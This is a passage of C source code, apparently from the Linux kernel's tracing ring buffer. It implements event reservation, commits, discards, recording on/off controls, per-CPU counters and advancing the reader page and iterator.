/* again, keep gcc from optimizing */
barrier();
/*
* If an interrupt came in just after the first while loop
* and pushed the tail page forward, we will be left with
* a dangling commit that will never go forward.
*/
if (unlikely(cpu_buffer->commit_page != READ_ONCE(cpu_buffer->tail_page)))
goto again;
}
static inline void rb_end_commit(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned long commits;
if (RB_WARN_ON(cpu_buffer,
!local_read(&cpu_buffer->committing)))
return;
again:
commits = local_read(&cpu_buffer->commits);
/* synchronize with interrupts */
barrier();
if (local_read(&cpu_buffer->committing) == 1)
rb_set_commit_to_write(cpu_buffer);
local_dec(&cpu_buffer->committing);
/* synchronize with interrupts */
barrier();
/*
* Need to account for interrupts coming in between the
* updating of the commit page and the clearing of the
* committing counter.
*/
if (unlikely(local_read(&cpu_buffer->commits) != commits) &&
!local_read(&cpu_buffer->committing)) {
local_inc(&cpu_buffer->committing);
goto again;
}
}
static inline void rb_event_discard(struct ring_buffer_event *event)
{
if (event->type_len == RINGBUF_TYPE_TIME_EXTEND)
event = skip_time_extend(event);
/* array[0] holds the actual length for the discarded event */
event->array[0] = rb_event_data_length(event) - RB_EVNT_HDR_SIZE;
event->type_len = RINGBUF_TYPE_PADDING;
/* time delta must be non zero */
if (!event->time_delta)
event->time_delta = 1;
}
static inline bool
rb_event_is_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
unsigned long index;
index = rb_event_index(event);
addr &= PAGE_MASK;
return cpu_buffer->commit_page->page == (void *)addr &&
rb_commit_index(cpu_buffer) == index;
}
static void
rb_update_write_stamp(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
u64 delta;
/*
* The event first in the commit queue updates the
* time stamp.
*/
if (rb_event_is_commit(cpu_buffer, event)) {
/*
* A commit event that is first on a page
* updates the write timestamp with the page stamp
*/
if (!rb_event_index(event))
cpu_buffer->write_stamp =
cpu_buffer->commit_page->page->time_stamp;
else if (event->type_len == RINGBUF_TYPE_TIME_EXTEND) {
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
cpu_buffer->write_stamp += delta;
} else
cpu_buffer->write_stamp += event->time_delta;
}
}
static void rb_commit(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
local_inc(&cpu_buffer->entries);
rb_update_write_stamp(cpu_buffer, event);
rb_end_commit(cpu_buffer);
}
static __always_inline void
rb_wakeups(struct ring_buffer *buffer, struct ring_buffer_per_cpu *cpu_buffer)
{
bool pagebusy;
if (buffer->irq_work.waiters_pending) {
buffer->irq_work.waiters_pending = false;
/* irq_work_queue() supplies it's own memory barriers */
irq_work_queue(&buffer->irq_work.work);
}
if (cpu_buffer->irq_work.waiters_pending) {
cpu_buffer->irq_work.waiters_pending = false;
/* irq_work_queue() supplies it's own memory barriers */
irq_work_queue(&cpu_buffer->irq_work.work);
}
pagebusy = cpu_buffer->reader_page == cpu_buffer->commit_page;
if (!pagebusy && cpu_buffer->irq_work.full_waiters_pending) {
cpu_buffer->irq_work.wakeup_full = true;
cpu_buffer->irq_work.full_waiters_pending = false;
/* irq_work_queue() supplies it's own memory barriers */
irq_work_queue(&cpu_buffer->irq_work.work);
}
}
/*
* The lock and unlock are done within a preempt disable section.
* The current_context per_cpu variable can only be modified
* by the current task between lock and unlock. But it can
* be modified more than once via an interrupt. To pass this
* information from the lock to the unlock without having to
* access the 'in_interrupt()' functions again (which do show
* a bit of overhead in something as critical as function tracing,
* we use a bitmask trick.
*
* bit 0 = NMI context
* bit 1 = IRQ context
* bit 2 = SoftIRQ context
* bit 3 = normal context.
*
* This works because this is the order of contexts that can
* preempt other contexts. A SoftIRQ never preempts an IRQ
* context.
*
* When the context is determined, the corresponding bit is
* checked and set (if it was set, then a recursion of that context
* happened).
*
* On unlock, we need to clear this bit. To do so, just subtract
* 1 from the current_context and AND it to itself.
*
* (binary)
* 101 - 1 = 100
* 101 & 100 = 100 (clearing bit zero)
*
* 1010 - 1 = 1001
* 1010 & 1001 = 1000 (clearing bit 1)
*
* The least significant bit can be cleared this way, and it
* just so happens that it is the same bit corresponding to
* the current context.
*/
static __always_inline int
trace_recursive_lock(struct ring_buffer_per_cpu *cpu_buffer)
{
unsigned int val = cpu_buffer->current_context;
int bit;
if (in_interrupt()) {
if (in_nmi())
bit = RB_CTX_NMI;
else if (in_irq())
bit = RB_CTX_IRQ;
else
bit = RB_CTX_SOFTIRQ;
} else
bit = RB_CTX_NORMAL;
if (unlikely(val & (1 << bit)))
return 1;
val |= (1 << bit);
cpu_buffer->current_context = val;
return 0;
}
static __always_inline void
trace_recursive_unlock(struct ring_buffer_per_cpu *cpu_buffer)
{
cpu_buffer->current_context &= cpu_buffer->current_context - 1;
}
/**
* ring_buffer_unlock_commit - commit a reserved
* @buffer: The buffer to commit to
* @event: The event pointer to commit.
*
* This commits the data to the ring buffer, and releases any locks held.
*
* Must be paired with ring_buffer_lock_reserve.
*/
int ring_buffer_unlock_commit(struct ring_buffer *buffer,
struct ring_buffer_event *event)
{
struct ring_buffer_per_cpu *cpu_buffer;
int cpu = raw_smp_processor_id();
cpu_buffer = buffer->buffers[cpu];
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
trace_recursive_unlock(cpu_buffer);
preempt_enable_notrace();
return 0;
}
EXPORT_SYMBOL_GPL(ring_buffer_unlock_commit);
static noinline void
rb_handle_timestamp(struct ring_buffer_per_cpu *cpu_buffer,
struct rb_event_info *info)
{
WARN_ONCE(info->delta > (1ULL << 59),
KERN_WARNING "Delta way too big! %llu ts=%llu write stamp = %llu\n%s",
(unsigned long long)info->delta,
(unsigned long long)info->ts,
(unsigned long long)cpu_buffer->write_stamp,
sched_clock_stable() ? "" :
"If you just came from a suspend/resume,\n"
"please switch to the trace global clock:\n"
" echo global > /sys/kernel/debug/tracing/trace_clock\n");
info->add_timestamp = 1;
}
static struct ring_buffer_event *
__rb_reserve_next(struct ring_buffer_per_cpu *cpu_buffer,
struct rb_event_info *info)
{
struct ring_buffer_event *event;
struct buffer_page *tail_page;
unsigned long tail, write;
/*
* If the time delta since the last event is too big to
* hold in the time field of the event, then we append a
* TIME EXTEND event ahead of the data event.
*/
if (unlikely(info->add_timestamp))
info->length += RB_LEN_TIME_EXTEND;
/* Don't let the compiler play games with cpu_buffer->tail_page */
tail_page = info->tail_page = READ_ONCE(cpu_buffer->tail_page);
write = local_add_return(info->length, &tail_page->write);
/* set write to only the index of the write */
write &= RB_WRITE_MASK;
tail = write - info->length;
/*
* If this is the first commit on the page, then it has the same
* timestamp as the page itself.
*/
if (!tail)
info->delta = 0;
/* See if we shot pass the end of this buffer page */
if (unlikely(write > BUF_PAGE_SIZE))
return rb_move_tail(cpu_buffer, tail, info);
/* We reserved something on the buffer */
event = __rb_page_index(tail_page, tail);
kmemcheck_annotate_bitfield(event, bitfield);
rb_update_event(cpu_buffer, event, info);
local_inc(&tail_page->entries);
/*
* If this is the first commit on the page, then update
* its timestamp.
*/
if (!tail)
tail_page->page->time_stamp = info->ts;
/* account for these added bytes */
local_add(info->length, &cpu_buffer->entries_bytes);
return event;
}
static struct ring_buffer_event *
rb_reserve_next_event(struct ring_buffer *buffer,
struct ring_buffer_per_cpu *cpu_buffer,
unsigned long length)
{
struct ring_buffer_event *event;
struct rb_event_info info;
int nr_loops = 0;
u64 diff;
rb_start_commit(cpu_buffer);
#ifdef CONFIG_RING_BUFFER_ALLOW_SWAP
/*
* Due to the ability to swap a cpu buffer from a buffer
* it is possible it was swapped before we committed.
* (committing stops a swap). We check for it here and
* if it happened, we have to fail the write.
*/
barrier();
if (unlikely(ACCESS_ONCE(cpu_buffer->buffer) != buffer)) {
local_dec(&cpu_buffer->committing);
local_dec(&cpu_buffer->commits);
return NULL;
}
#endif
info.length = rb_calculate_event_length(length);
again:
info.add_timestamp = 0;
info.delta = 0;
/*
* We allow for interrupts to reenter here and do a trace.
* If one does, it will cause this original code to loop
* back here. Even with heavy interrupts happening, this
* should only happen a few times in a row. If this happens
* 1000 times in a row, there must be either an interrupt
* storm or we have something buggy.
* Bail!
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 1000))
goto out_fail;
info.ts = rb_time_stamp(cpu_buffer->buffer);
diff = info.ts - cpu_buffer->write_stamp;
/* make sure this diff is calculated here */
barrier();
/* Did the write stamp get updated already? */
if (likely(info.ts >= cpu_buffer->write_stamp)) {
info.delta = diff;
if (unlikely(test_time_stamp(info.delta)))
rb_handle_timestamp(cpu_buffer, &info);
}
event = __rb_reserve_next(cpu_buffer, &info);
if (unlikely(PTR_ERR(event) == -EAGAIN)) {
if (info.add_timestamp)
info.length -= RB_LEN_TIME_EXTEND;
goto again;
}
if (!event)
goto out_fail;
return event;
out_fail:
rb_end_commit(cpu_buffer);
return NULL;
}
/**
* ring_buffer_lock_reserve - reserve a part of the buffer
* @buffer: the ring buffer to reserve from
* @length: the length of the data to reserve (excluding event header)
*
* Returns a reseverd event on the ring buffer to copy directly to.
* The user of this interface will need to get the body to write into
* and can use the ring_buffer_event_data() interface.
*
* The length is the length of the data needed, not the event length
* which also includes the event header.
*
* Must be paired with ring_buffer_unlock_commit, unless NULL is returned.
* If NULL is returned, then nothing has been allocated or locked.
*/
struct ring_buffer_event *
ring_buffer_lock_reserve(struct ring_buffer *buffer, unsigned long length)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
int cpu;
/* If we are tracing schedule, we don't want to recurse */
preempt_disable_notrace();
if (unlikely(atomic_read(&buffer->record_disabled)))
goto out;
cpu = raw_smp_processor_id();
if (unlikely(!cpumask_test_cpu(cpu, buffer->cpumask)))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (unlikely(atomic_read(&cpu_buffer->record_disabled)))
goto out;
if (unlikely(length > BUF_MAX_DATA_SIZE))
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
return event;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return NULL;
}
EXPORT_SYMBOL_GPL(ring_buffer_lock_reserve);
/*
* Decrement the entries to the page that an event is on.
* The event does not even need to exist, only the pointer
* to the page it is on. This may only be called before the commit
* takes place.
*/
static inline void
rb_decrement_entry(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
unsigned long addr = (unsigned long)event;
struct buffer_page *bpage = cpu_buffer->commit_page;
struct buffer_page *start;
addr &= PAGE_MASK;
/* Do the likely case first */
if (likely(bpage->page == (void *)addr)) {
local_dec(&bpage->entries);
return;
}
/*
* Because the commit page may be on the reader page we
* start with the next page and check the end loop there.
*/
rb_inc_page(cpu_buffer, &bpage);
start = bpage;
do {
if (bpage->page == (void *)addr) {
local_dec(&bpage->entries);
return;
}
rb_inc_page(cpu_buffer, &bpage);
} while (bpage != start);
/* commit not part of this buffer?? */
RB_WARN_ON(cpu_buffer, 1);
}
/**
* ring_buffer_commit_discard - discard an event that has not been committed
* @buffer: the ring buffer
* @event: non committed event to discard
*
* Sometimes an event that is in the ring buffer needs to be ignored.
* This function lets the user discard an event in the ring buffer
* and then that event will not be read later.
*
* This function only works if it is called before the the item has been
* committed. It will try to free the event from the ring buffer
* if another event has not been added behind it.
*
* If another event has been added behind it, it will set the event
* up as discarded, and perform the commit.
*
* If this function is called, do not call ring_buffer_unlock_commit on
* the event.
*/
void ring_buffer_discard_commit(struct ring_buffer *buffer,
struct ring_buffer_event *event)
{
struct ring_buffer_per_cpu *cpu_buffer;
int cpu;
/* The event is discarded regardless */
rb_event_discard(event);
cpu = smp_processor_id();
cpu_buffer = buffer->buffers[cpu];
/*
* This must only be called if the event has not been
* committed yet. Thus we can assume that preemption
* is still disabled.
*/
RB_WARN_ON(buffer, !local_read(&cpu_buffer->committing));
rb_decrement_entry(cpu_buffer, event);
if (rb_try_to_discard(cpu_buffer, event))
goto out;
/*
* The commit is still visible by the reader, so we
* must still update the timestamp.
*/
rb_update_write_stamp(cpu_buffer, event);
out:
rb_end_commit(cpu_buffer);
trace_recursive_unlock(cpu_buffer);
preempt_enable_notrace();
}
EXPORT_SYMBOL_GPL(ring_buffer_discard_commit);
/**
* ring_buffer_write - write data to the buffer without reserving
* @buffer: The ring buffer to write to.
* @length: The length of the data being written (excluding the event header)
* @data: The data to write to the buffer.
*
* This is like ring_buffer_lock_reserve and ring_buffer_unlock_commit as
* one function. If you already have the data to write to the buffer, it
* may be easier to simply call this function.
*
* Note, like ring_buffer_lock_reserve, the length is the length of the data
* and not the length of the event which would hold the header.
*/
int ring_buffer_write(struct ring_buffer *buffer,
unsigned long length,
void *data)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
void *body;
int ret = -EBUSY;
int cpu;
preempt_disable_notrace();
if (atomic_read(&buffer->record_disabled))
goto out;
cpu = raw_smp_processor_id();
if (!cpumask_test_cpu(cpu, buffer->cpumask))
goto out;
cpu_buffer = buffer->buffers[cpu];
if (atomic_read(&cpu_buffer->record_disabled))
goto out;
if (length > BUF_MAX_DATA_SIZE)
goto out;
if (unlikely(trace_recursive_lock(cpu_buffer)))
goto out;
event = rb_reserve_next_event(buffer, cpu_buffer, length);
if (!event)
goto out_unlock;
body = rb_event_data(event);
memcpy(body, data, length);
rb_commit(cpu_buffer, event);
rb_wakeups(buffer, cpu_buffer);
ret = 0;
out_unlock:
trace_recursive_unlock(cpu_buffer);
out:
preempt_enable_notrace();
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_write);
static bool rb_per_cpu_empty(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *reader = cpu_buffer->reader_page;
struct buffer_page *head = rb_set_head_page(cpu_buffer);
struct buffer_page *commit = cpu_buffer->commit_page;
/* In case of error, head will be NULL */
if (unlikely(!head))
return true;
return reader->read == rb_page_commit(reader) &&
(commit == reader ||
(commit == head &&
head->read == rb_page_commit(commit)));
}
/**
* ring_buffer_record_disable - stop all writes into the buffer
* @buffer: The ring buffer to stop writes to.
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* The caller should call synchronize_sched() after this.
*/
void ring_buffer_record_disable(struct ring_buffer *buffer)
{
atomic_inc(&buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_disable);
/**
* ring_buffer_record_enable - enable writes to the buffer
* @buffer: The ring buffer to enable writes
*
* Note, multiple disables will need the same number of enables
* to truly enable the writing (much like preempt_disable).
*/
void ring_buffer_record_enable(struct ring_buffer *buffer)
{
atomic_dec(&buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_enable);
/**
* ring_buffer_record_off - stop all writes into the buffer
* @buffer: The ring buffer to stop writes to.
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* This is different than ring_buffer_record_disable() as
* it works like an on/off switch, where as the disable() version
* must be paired with a enable().
*/
void ring_buffer_record_off(struct ring_buffer *buffer)
{
unsigned int rd;
unsigned int new_rd;
do {
rd = atomic_read(&buffer->record_disabled);
new_rd = rd | RB_BUFFER_OFF;
} while (atomic_cmpxchg(&buffer->record_disabled, rd, new_rd) != rd);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_off);
/**
* ring_buffer_record_on - restart writes into the buffer
* @buffer: The ring buffer to start writes to.
*
* This enables all writes to the buffer that was disabled by
* ring_buffer_record_off().
*
* This is different than ring_buffer_record_enable() as
* it works like an on/off switch, where as the enable() version
* must be paired with a disable().
*/
void ring_buffer_record_on(struct ring_buffer *buffer)
{
unsigned int rd;
unsigned int new_rd;
do {
rd = atomic_read(&buffer->record_disabled);
new_rd = rd & ~RB_BUFFER_OFF;
} while (atomic_cmpxchg(&buffer->record_disabled, rd, new_rd) != rd);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_on);
/**
* ring_buffer_record_is_on - return true if the ring buffer can write
* @buffer: The ring buffer to see if write is enabled
*
* Returns true if the ring buffer is in a state that it accepts writes.
*/
int ring_buffer_record_is_on(struct ring_buffer *buffer)
{
return !atomic_read(&buffer->record_disabled);
}
/**
* ring_buffer_record_disable_cpu - stop all writes into the cpu_buffer
* @buffer: The ring buffer to stop writes to.
* @cpu: The CPU buffer to stop
*
* This prevents all writes to the buffer. Any attempt to write
* to the buffer after this will fail and return NULL.
*
* The caller should call synchronize_sched() after this.
*/
void ring_buffer_record_disable_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
cpu_buffer = buffer->buffers[cpu];
atomic_inc(&cpu_buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_disable_cpu);
/**
* ring_buffer_record_enable_cpu - enable writes to the buffer
* @buffer: The ring buffer to enable writes
* @cpu: The CPU to enable.
*
* Note, multiple disables will need the same number of enables
* to truly enable the writing (much like preempt_disable).
*/
void ring_buffer_record_enable_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return;
cpu_buffer = buffer->buffers[cpu];
atomic_dec(&cpu_buffer->record_disabled);
}
EXPORT_SYMBOL_GPL(ring_buffer_record_enable_cpu);
/*
* The total entries in the ring buffer is the running counter
* of entries entered into the ring buffer, minus the sum of
* the entries read from the ring buffer and the number of
* entries that were overwritten.
*/
static inline unsigned long
rb_num_of_entries(struct ring_buffer_per_cpu *cpu_buffer)
{
return local_read(&cpu_buffer->entries) -
(local_read(&cpu_buffer->overrun) + cpu_buffer->read);
}
/**
* ring_buffer_oldest_event_ts - get the oldest event timestamp from the buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to read from.
*/
u64 ring_buffer_oldest_event_ts(struct ring_buffer *buffer, int cpu)
{
unsigned long flags;
struct ring_buffer_per_cpu *cpu_buffer;
struct buffer_page *bpage;
u64 ret = 0;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
/*
* if the tail is on reader_page, oldest time stamp is on the reader
* page
*/
if (cpu_buffer->tail_page == cpu_buffer->reader_page)
bpage = cpu_buffer->reader_page;
else
bpage = rb_set_head_page(cpu_buffer);
if (bpage)
ret = bpage->page->time_stamp;
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_oldest_event_ts);
/**
* ring_buffer_bytes_cpu - get the number of bytes consumed in a cpu buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to read from.
*/
unsigned long ring_buffer_bytes_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->entries_bytes) - cpu_buffer->read_bytes;
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_bytes_cpu);
/**
* ring_buffer_entries_cpu - get the number of entries in a cpu buffer
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the entries from.
*/
unsigned long ring_buffer_entries_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
return rb_num_of_entries(cpu_buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_entries_cpu);
/**
* ring_buffer_overrun_cpu - get the number of overruns caused by the ring
* buffer wrapping around (only if RB_FL_OVERWRITE is on).
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long ring_buffer_overrun_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->overrun);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_overrun_cpu);
/**
* ring_buffer_commit_overrun_cpu - get the number of overruns caused by
* commits failing due to the buffer wrapping around while there are uncommitted
* events, such as during an interrupt storm.
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long
ring_buffer_commit_overrun_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->commit_overrun);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_commit_overrun_cpu);
/**
* ring_buffer_dropped_events_cpu - get the number of dropped events caused by
* the ring buffer filling up (only if RB_FL_OVERWRITE is off).
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of overruns from
*/
unsigned long
ring_buffer_dropped_events_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long ret;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
ret = local_read(&cpu_buffer->dropped_events);
return ret;
}
EXPORT_SYMBOL_GPL(ring_buffer_dropped_events_cpu);
/**
* ring_buffer_read_events_cpu - get the number of events successfully read
* @buffer: The ring buffer
* @cpu: The per CPU buffer to get the number of events read
*/
unsigned long
ring_buffer_read_events_cpu(struct ring_buffer *buffer, int cpu)
{
struct ring_buffer_per_cpu *cpu_buffer;
if (!cpumask_test_cpu(cpu, buffer->cpumask))
return 0;
cpu_buffer = buffer->buffers[cpu];
return cpu_buffer->read;
}
EXPORT_SYMBOL_GPL(ring_buffer_read_events_cpu);
/**
* ring_buffer_entries - get the number of entries in a buffer
* @buffer: The ring buffer
*
* Returns the total number of entries in the ring buffer
* (all CPU entries)
*/
unsigned long ring_buffer_entries(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long entries = 0;
int cpu;
/* if you care about this being correct, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
entries += rb_num_of_entries(cpu_buffer);
}
return entries;
}
EXPORT_SYMBOL_GPL(ring_buffer_entries);
/**
* ring_buffer_overruns - get the number of overruns in buffer
* @buffer: The ring buffer
*
* Returns the total number of overruns in the ring buffer
* (all CPU entries)
*/
unsigned long ring_buffer_overruns(struct ring_buffer *buffer)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long overruns = 0;
int cpu;
/* if you care about this being correct, lock the buffer */
for_each_buffer_cpu(buffer, cpu) {
cpu_buffer = buffer->buffers[cpu];
overruns += local_read(&cpu_buffer->overrun);
}
return overruns;
}
EXPORT_SYMBOL_GPL(ring_buffer_overruns);
static void rb_iter_reset(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer = iter->cpu_buffer;
/* Iterator usage is expected to have record disabled */
iter->head_page = cpu_buffer->reader_page;
iter->head = cpu_buffer->reader_page->read;
iter->cache_reader_page = iter->head_page;
iter->cache_read = cpu_buffer->read;
if (iter->head)
iter->read_stamp = cpu_buffer->read_stamp;
else
iter->read_stamp = iter->head_page->page->time_stamp;
}
/**
* ring_buffer_iter_reset - reset an iterator
* @iter: The iterator to reset
*
* Resets the iterator, so that it will start from the beginning
* again.
*/
void ring_buffer_iter_reset(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
unsigned long flags;
if (!iter)
return;
cpu_buffer = iter->cpu_buffer;
raw_spin_lock_irqsave(&cpu_buffer->reader_lock, flags);
rb_iter_reset(iter);
raw_spin_unlock_irqrestore(&cpu_buffer->reader_lock, flags);
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_reset);
/**
* ring_buffer_iter_empty - check if an iterator has no more to read
* @iter: The iterator to check
*/
int ring_buffer_iter_empty(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
cpu_buffer = iter->cpu_buffer;
return iter->head_page == cpu_buffer->commit_page &&
iter->head == rb_commit_index(cpu_buffer);
}
EXPORT_SYMBOL_GPL(ring_buffer_iter_empty);
static void
rb_update_read_stamp(struct ring_buffer_per_cpu *cpu_buffer,
struct ring_buffer_event *event)
{
u64 delta;
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
return;
case RINGBUF_TYPE_TIME_EXTEND:
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
cpu_buffer->read_stamp += delta;
return;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
return;
case RINGBUF_TYPE_DATA:
cpu_buffer->read_stamp += event->time_delta;
return;
default:
BUG();
}
return;
}
static void
rb_update_iter_read_stamp(struct ring_buffer_iter *iter,
struct ring_buffer_event *event)
{
u64 delta;
switch (event->type_len) {
case RINGBUF_TYPE_PADDING:
return;
case RINGBUF_TYPE_TIME_EXTEND:
delta = event->array[0];
delta <<= TS_SHIFT;
delta += event->time_delta;
iter->read_stamp += delta;
return;
case RINGBUF_TYPE_TIME_STAMP:
/* FIXME: not implemented */
return;
case RINGBUF_TYPE_DATA:
iter->read_stamp += event->time_delta;
return;
default:
BUG();
}
return;
}
static struct buffer_page *
rb_get_reader_page(struct ring_buffer_per_cpu *cpu_buffer)
{
struct buffer_page *reader = NULL;
unsigned long overwrite;
unsigned long flags;
int nr_loops = 0;
int ret;
local_irq_save(flags);
arch_spin_lock(&cpu_buffer->lock);
again:
/*
* This should normally only loop twice. But because the
* start of the reader inserts an empty page, it causes
* a case where we will loop three times. There should be no
* reason to loop four times (that I know of).
*/
if (RB_WARN_ON(cpu_buffer, ++nr_loops > 3)) {
reader = NULL;
goto out;
}
reader = cpu_buffer->reader_page;
/* If there's more to read, return this page */
if (cpu_buffer->reader_page->read < rb_page_size(reader))
goto out;
/* Never should we have an index greater than the size */
if (RB_WARN_ON(cpu_buffer,
cpu_buffer->reader_page->read > rb_page_size(reader)))
goto out;
/* check if we caught up to the tail */
reader = NULL;
if (cpu_buffer->commit_page == cpu_buffer->reader_page)
goto out;
/* Don't bother swapping if the ring buffer is empty */
if (rb_num_of_entries(cpu_buffer) == 0)
goto out;
/*
* Reset the reader page to size zero.
*/
local_set(&cpu_buffer->reader_page->write, 0);
local_set(&cpu_buffer->reader_page->entries, 0);
local_set(&cpu_buffer->reader_page->page->commit, 0);
cpu_buffer->reader_page->real_end = 0;
spin:
/*
* Splice the empty reader page into the list around the head.
*/
reader = rb_set_head_page(cpu_buffer);
if (!reader)
goto out;
cpu_buffer->reader_page->list.next = rb_list_head(reader->list.next);
cpu_buffer->reader_page->list.prev = reader->list.prev;
/*
* cpu_buffer->pages just needs to point to the buffer, it
* has no specific buffer page to point to. Lets move it out
* of our way so we don't accidentally swap it.
*/
cpu_buffer->pages = reader->list.prev;
/* The reader page will be pointing to the new head */
rb_set_list_to_head(cpu_buffer, &cpu_buffer->reader_page->list);
/*
* We want to make sure we read the overruns after we set up our
* pointers to the next object. The writer side does a
* cmpxchg to cross pages which acts as the mb on the writer
* side. Note, the reader will constantly fail the swap
* while the writer is updating the pointers, so this
* guarantees that the overwrite recorded here is the one we
* want to compare with the last_overrun.
*/
smp_mb();
overwrite = local_read(&(cpu_buffer->overrun));
/*
* Here's the tricky part.
*
* We need to move the pointer past the header page.
* But we can only do that if a writer is not currently
* moving it. The page before the header page has the
* flag bit '1' set if it is pointing to the page we want.
* but if the writer is in the process of moving it
* than it will be '2' or already moved '0'.
*/
ret = rb_head_page_replace(reader, cpu_buffer->reader_page);
/*
* If we did not convert it, then we must try again.
*/
if (!ret)
goto spin;
/*
* Yeah! We succeeded in replacing the page.
*
* Now make the new head point back to the reader page.
*/
rb_list_head(reader->list.next)->prev = &cpu_buffer->reader_page->list;
rb_inc_page(cpu_buffer, &cpu_buffer->head_page);
/* Finally update the reader page to the new head */
cpu_buffer->reader_page = reader;
cpu_buffer->reader_page->read = 0;
if (overwrite != cpu_buffer->last_overrun) {
cpu_buffer->lost_events = overwrite - cpu_buffer->last_overrun;
cpu_buffer->last_overrun = overwrite;
}
goto again;
out:
/* Update the read_stamp on the first event */
if (reader && reader->read == 0)
cpu_buffer->read_stamp = reader->page->time_stamp;
arch_spin_unlock(&cpu_buffer->lock);
local_irq_restore(flags);
return reader;
}
static void rb_advance_reader(struct ring_buffer_per_cpu *cpu_buffer)
{
struct ring_buffer_event *event;
struct buffer_page *reader;
unsigned length;
reader = rb_get_reader_page(cpu_buffer);
/* This function should not be called when buffer is empty */
if (RB_WARN_ON(cpu_buffer, !reader))
return;
event = rb_reader_event(cpu_buffer);
if (event->type_len <= RINGBUF_TYPE_DATA_TYPE_LEN_MAX)
cpu_buffer->read++;
rb_update_read_stamp(cpu_buffer, event);
length = rb_event_length(event);
cpu_buffer->reader_page->read += length;
}
static void rb_advance_iter(struct ring_buffer_iter *iter)
{
struct ring_buffer_per_cpu *cpu_buffer;
struct ring_buffer_event *event;
unsigned length;
cpu_buffer = iter->cpu_buffer;
/*
* Check if we are at the end of the buffer.
*/
if (iter->head >= rb_page_size(iter->head_page)) {
/* discarded commits can make the page empty */
if (iter->head_page == cpu_buffer->commit_page)
return;
rb_inc_iter(iter);
return;
}
event = rb_iter_head_event(iter);
length = rb_event_length(event);
/*
* This should not be called to advance the header if we are
* at the tail of the buffer.
*/
if (RB_WARN_ON(cpu_buffer,
(iter->head_page == cpu_buffer->commit_page) &&
(iter->head + length > rb_commit_index(cpu_buffer))))
return;
rb_update_iter_read_stamp(iter, event);
iter->head += length;
/* check for end of page padding */
